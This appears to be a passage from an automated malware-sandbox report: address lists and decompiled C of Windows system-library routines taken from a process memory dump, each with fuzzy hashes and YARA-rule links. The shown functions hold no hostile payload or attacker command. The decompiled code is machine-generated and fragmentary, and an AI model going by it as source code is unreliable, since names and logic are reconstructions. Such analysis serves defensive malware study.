                                      0x00000000
                                      0x037414f2
                                      0x037414e8
                                      0x00000000
                                      0x037414e8
                                      0x037090d8
                                      0x037090da
                                      0x037090dd
                                      0x037090e5
                                      0x00000000
                                      0x03709139
                                      0x037090fa
                                      0x037090fe
                                      0x03709142
                                      0x00000000
                                      0x03709142
                                      0x03709104
                                      0x03709107
                                      0x0370910b
                                      0x03709110
                                      0x03709118
                                      0x03709147
                                      0x03709148
                                      0x0370914f
                                      0x03709150
                                      0x03709151
                                      0x03709152
                                      0x03709156
                                      0x0370915d
                                      0x03709160
                                      0x03709168
                                      0x0370916c
                                      0x037091bc
                                      0x037091be
                                      0x00000000
                                      0x037091be
                                      0x0370916e
                                      0x03709173
                                      0x03709176
                                      0x00000000
                                      0x00000000
                                      0x0370917c
                                      0x03709180
                                      0x037091b5
                                      0x00000000
                                      0x037091b5
                                      0x03709182
                                      0x03709185
                                      0x03709189
                                      0x00000000
                                      0x00000000
                                      0x0370918e
                                      0x03709190
                                      0x03709198
                                      0x00000000
                                      0x00000000
                                      0x037091a0
                                      0x00000000
                                      0x037091ad
                                      0x037091ad
                                      0x037091b0
                                      0x037091b1
                                      0x00000000
                                      0x03709185
                                      0x0370911a
                                      0x0370911c
                                      0x0370911f
                                      0x03709125
                                      0x03709127
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                      • Instruction ID: dc4c974f7a34053bffdac7d50ccc8dbef57e01b6b94a4e316800be5b4d900cf2
                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                      • Instruction Fuzzy Hash: DF219275A00304EFDB20DF59C844EAAF7F8EB48310F14886AEA45AB251D370ED44CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F3B7A, Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 59%
                                      			E036F3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x37b84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x37b84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x37b84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0370AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0370FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x37b84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x37b84c4; // 0x0
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                      0x036f3b89
                                      0x036f3b96
                                      0x036f3ba1
                                      0x036f3bab
                                      0x036f3bb5
                                      0x036f3bb9
                                      0x03736298
                                      0x036f3bbf
                                      0x036f3bc2
                                      0x036f3bc3
                                      0x036f3bc9
                                      0x036f3bca
                                      0x036f3bcc
                                      0x036f3bcd
                                      0x036f3bd4
                                      0x036f3bd6
                                      0x036f3bdb
                                      0x036f3bea
                                      0x036f3bf7
                                      0x036f3bfb
                                      0x036f3bff
                                      0x036f3c09
                                      0x036f3c0a
                                      0x036f3c0b
                                      0x036f3c0f
                                      0x036f3c14
                                      0x036f3c18
                                      0x036f3c18
                                      0x036f3bfb
                                      0x036f3c1b
                                      0x036f3c30
                                      0x036f3c30
                                      0x036f3c3d

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15edea31665680e3d9c5961f8f86c5d91637009ae60cab33f3202b13fe7e77e2
                                      • Instruction ID: 79b4805b68dad685ba93ec10fb117e800012ba344be41e7b7274a37930544167
                                      • Opcode Fuzzy Hash: 15edea31665680e3d9c5961f8f86c5d91637009ae60cab33f3202b13fe7e77e2
                                      • Instruction Fuzzy Hash: 70219FB6A00208AFCB04EF98CD81F5AB7BDFB44708F254068EA08AB251D775ED15CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03746CF0, Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E03746CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E036E7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E036E7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x36a5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E036FF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E036FF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03747016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L036E2400( &_v52);
								}
								_t21 = L036E2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                      0x03746cfb
                                      0x03746d00
                                      0x03746d02
                                      0x03746d06
                                      0x03746d0a
                                      0x03746d0e
                                      0x03746d19
                                      0x03746d2b
                                      0x03746d1b
                                      0x03746d24
                                      0x03746d24
                                      0x03746d33
                                      0x03746d39
                                      0x03746d46
                                      0x03746d4f
                                      0x03746d61
                                      0x03746d51
                                      0x03746d5a
                                      0x03746d5a
                                      0x03746d69
                                      0x03746d6b
                                      0x03746d6d
                                      0x03746d6f
                                      0x03746d6f
                                      0x03746d74
                                      0x03746d79
                                      0x03746d7a
                                      0x03746d7f
                                      0x03746d82
                                      0x03746d88
                                      0x03746d89
                                      0x03746d90
                                      0x03746d94
                                      0x03746da7
                                      0x03746db1
                                      0x03746db1
                                      0x03746dbb
                                      0x03746dbb
                                      0x03746d90
                                      0x03746d69
                                      0x03746d46
                                      0x03746dc6

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5a2ef911b721ea43b325d44ff33b1d1c9b18aaee0dffd294a44bbac9a268e043
                                      • Instruction ID: 991f7a9a9b03afa3ce30de65b7b58027f96d966800672a18577359aaf5abb44f
                                      • Opcode Fuzzy Hash: 5a2ef911b721ea43b325d44ff33b1d1c9b18aaee0dffd294a44bbac9a268e043
                                      • Instruction Fuzzy Hash: 9121D7725057449FCB11EF69C944F67B7ECEF82740F08055AF940EB251EB34E908CAA6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0379070D, Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E0379070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E037907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0378AFDE( &_v8,  &_v12);
					E03791293(_t38, _v28, _t60);
					if(E036E7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E037814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                      0x0379071b
                                      0x03790724
                                      0x03790734
                                      0x03790738
                                      0x0379074b
                                      0x0379074b
                                      0x03790753
                                      0x03790753
                                      0x03790759
                                      0x0379075d
                                      0x03790774
                                      0x03790779
                                      0x0379077d
                                      0x03790789
                                      0x03790795
                                      0x037907a7
                                      0x03790797
                                      0x037907a0
                                      0x037907a0
                                      0x037907af
                                      0x037907c4
                                      0x037907cd
                                      0x037907cd
                                      0x037907af
                                      0x037907dc

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                      • Instruction ID: 56a8410187423efb3250bbb4040d8f278b6a845c33c4599cbb2cf5f15ce0cd96
                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                      • Instruction Fuzzy Hash: 2121F5362042049FDB05DF18DC84A6ABBA5EFC4350F08866EF9558F381D630D919CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03747794, Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E03747794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x37b7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0370F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E036E7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03709AE0();
					_t24 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                      0x03747799
                                      0x0374779a
                                      0x0374779b
                                      0x037477a3
                                      0x037477ab
                                      0x037477ae
                                      0x037477b1
                                      0x037477b1
                                      0x037477bf
                                      0x037477c4
                                      0x037477c8
                                      0x037477ce
                                      0x037477d4
                                      0x037477e0
                                      0x037477e0
                                      0x037477d6
                                      0x037477d6
                                      0x037477de
                                      0x00000000
                                      0x00000000
                                      0x037477de
                                      0x037477e5
                                      0x037477f0
                                      0x037477f3
                                      0x037477f6
                                      0x037477fd
                                      0x03747800
                                      0x0374780c
                                      0x03747818
                                      0x0374782b
                                      0x0374781a
                                      0x03747823
                                      0x03747823
                                      0x03747830
                                      0x03747831
                                      0x03747838
                                      0x0374783d
                                      0x0374783e
                                      0x0374784f
                                      0x0374784f
                                      0x0374785a

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24ea9c86f73cab7e475c8432bd8961d87301bd256baee8ab76efe2295b087bba
                                      • Instruction ID: 8b9a6d42c0c2ec2473c8b1da4660b0c18071a65a99f348e7dacf899c0336de29
                                      • Opcode Fuzzy Hash: 24ea9c86f73cab7e475c8432bd8961d87301bd256baee8ab76efe2295b087bba
                                      • Instruction Fuzzy Hash: 6D21CD72900644ABC729DF69D880E6BB7ACEF88340F14056DE50ADB690E734E900CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036EAE73, Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E036EAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E036E7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E036E7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E036E7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E036E7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03747794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                      0x036eae78
                                      0x036eae7c
                                      0x036eae7e
                                      0x036eae81
                                      0x036eae86
                                      0x036eae8d
                                      0x03732691
                                      0x036eae93
                                      0x036eae93
                                      0x036eae93
                                      0x036eae98
                                      0x036eae9d
                                      0x037326a2
                                      0x037326b4
                                      0x037326a4
                                      0x037326ad
                                      0x037326ad
                                      0x037326b9
                                      0x00000000
                                      0x037326bb
                                      0x00000000
                                      0x037326bb
                                      0x036eaea3
                                      0x036eaea3
                                      0x036eaea3
                                      0x036eaeaa
                                      0x037326c0
                                      0x037326c9
                                      0x037326c9
                                      0x036eaeb3
                                      0x037326d4
                                      0x037326e1
                                      0x00000000
                                      0x00000000
                                      0x037326e7
                                      0x037326ee
                                      0x037326f0
                                      0x037326f9
                                      0x037326f9
                                      0x03732702
                                      0x03732708
                                      0x03732708
                                      0x0373270b
                                      0x0373270f
                                      0x03732711
                                      0x03732711
                                      0x03732725
                                      0x03732725
                                      0x00000000
                                      0x036eaeb9
                                      0x036eaeb9
                                      0x036eaebf
                                      0x036eaebf
                                      0x036eaeb3

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                      • Instruction ID: 24586c08ff82242a3a6111e78cfd62905be09e4afbcec3103eec0eac1e673680
                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                      • Instruction Fuzzy Hash: B421D171A02684DFDB26DBA9D944B2577E8EF45240F1D04E4DD048BBA3E734DC41C6A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FFD9B, Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E036FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E036D76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                      0x036ffd9b
                                      0x036ffda0
                                      0x036ffda1
                                      0x036ffdab
                                      0x036ffdad
                                      0x036ffdb0
                                      0x036ffdb8
                                      0x036ffe0f
                                      0x036ffde6
                                      0x036ffde9
                                      0x036ffdec
                                      0x0373c0c0
                                      0x036ffdfe
                                      0x036ffe06
                                      0x036ffe06
                                      0x0373c0c8
                                      0x036ffe2d
                                      0x036ffe2d
                                      0x00000000
                                      0x036ffe2d
                                      0x0373c0d1
                                      0x0373c0e0
                                      0x0373c0e5
                                      0x0373c0e5
                                      0x0373c0e8
                                      0x00000000
                                      0x0373c0e8
                                      0x036ffdf4
                                      0x00000000
                                      0x00000000
                                      0x036ffdf6
                                      0x036ffdfa
                                      0x036ffe1a
                                      0x036ffe1f
                                      0x036ffe1f
                                      0x036ffdfc
                                      0x00000000
                                      0x036ffdfc
                                      0x036ffdcc
                                      0x036ffdd0
                                      0x036ffe26
                                      0x00000000
                                      0x036ffe26
                                      0x036ffdd8
                                      0x036ffddb
                                      0x036ffddd
                                      0x036ffde0
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                      • Instruction ID: b5953e0c51871b0f5fbf1709cdeaa412efd73ae30047313f8d8e415219cbd477
                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                      • Instruction Fuzzy Hash: 26217972A00A45EFC735CF0AC640A66F7E9EB94A10F28816EEA498B711D731AC01CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FB390, Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
                                      			E036FB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E036E2280(_t12, 0x37b8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E037000C2(0x37b8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                      0x036fb395
                                      0x036fb3a2
                                      0x036fb3a5
                                      0x036fb3aa
                                      0x036fb3b2
                                      0x036fb3ba
                                      0x036fb3bd
                                      0x036fb3c0
                                      0x036fb3c4
                                      0x036fb3c9
                                      0x0373a3e9
                                      0x0373a3ed
                                      0x0373a3f0
                                      0x0373a3ff
                                      0x0373a403
                                      0x0373a409
                                      0x00000000
                                      0x00000000
                                      0x0373a40b
                                      0x0373a40b
                                      0x0373a40f
                                      0x0373a415
                                      0x0373a423
                                      0x0373a423
                                      0x0373a415
                                      0x036fb3d1
                                      0x036fb3e8
                                      0x036fb3e8
                                      0x036fb3d9

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: beaf0cb50ec9e253d3c9cca5a713a6ffcc5e7dc548a06d37f71021943f0ae7ac
                                      • Instruction ID: 8d9563f755c9d72ccfda3813baa17035d5dc07cf44ca7d2c13b6c64f354aef9d
                                      • Opcode Fuzzy Hash: beaf0cb50ec9e253d3c9cca5a713a6ffcc5e7dc548a06d37f71021943f0ae7ac
                                      • Instruction Fuzzy Hash: A4116B373412189FCB18DA14DE81B6BB2ABEBC9330B28013DDE16CB380C9719C02C695
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036C9240, Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 77%
                                      			E036C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x379f708);
				E0371D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E037095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E037095D0();
				_t33 =  *0x37b84c4; // 0x0
				L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x37b84c4; // 0x0
				L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x37b84c4; // 0x0
				E036E2280(L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x37b86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E037095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E037095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E036C9325();
					_t50 =  *0x37b84c4; // 0x0
					return E0371D0D1(L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                      0x036c9240
                                      0x036c9242
                                      0x036c9247
                                      0x036c924c
                                      0x036c924e
                                      0x036c9255
                                      0x036c9257
                                      0x036c925a
                                      0x036c925f
                                      0x036c925f
                                      0x036c9266
                                      0x036c9271
                                      0x036c9276
                                      0x036c9279
                                      0x036c927e
                                      0x036c9295
                                      0x036c929a
                                      0x036c92b1
                                      0x036c92b6
                                      0x036c92d7
                                      0x036c92dc
                                      0x036c92e0
                                      0x036c92e6
                                      0x036c92e8
                                      0x036c92ee
                                      0x036c9332
                                      0x036c9333
                                      0x036c9337
                                      0x036c9338
                                      0x036c933a
                                      0x036c933a
                                      0x036c933d
                                      0x036c9342
                                      0x036c9342
                                      0x036c9345
                                      0x036c9349
                                      0x036c934e
                                      0x036c9352
                                      0x036c9357
                                      0x036c92f4
                                      0x036c92f4
                                      0x036c92f6
                                      0x036c92f9
                                      0x036c9300
                                      0x036c9306
                                      0x036c9324
                                      0x036c9324

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5bf2b22a85c57f4f605fe46ce6217ea7be639138a5c6391bf14b1ea0b690d3cf
                                      • Instruction ID: d1746f719851782f3d55d127cb81c6388ad040dae1a525b5a436e2f77f0418b0
                                      • Opcode Fuzzy Hash: 5bf2b22a85c57f4f605fe46ce6217ea7be639138a5c6391bf14b1ea0b690d3cf
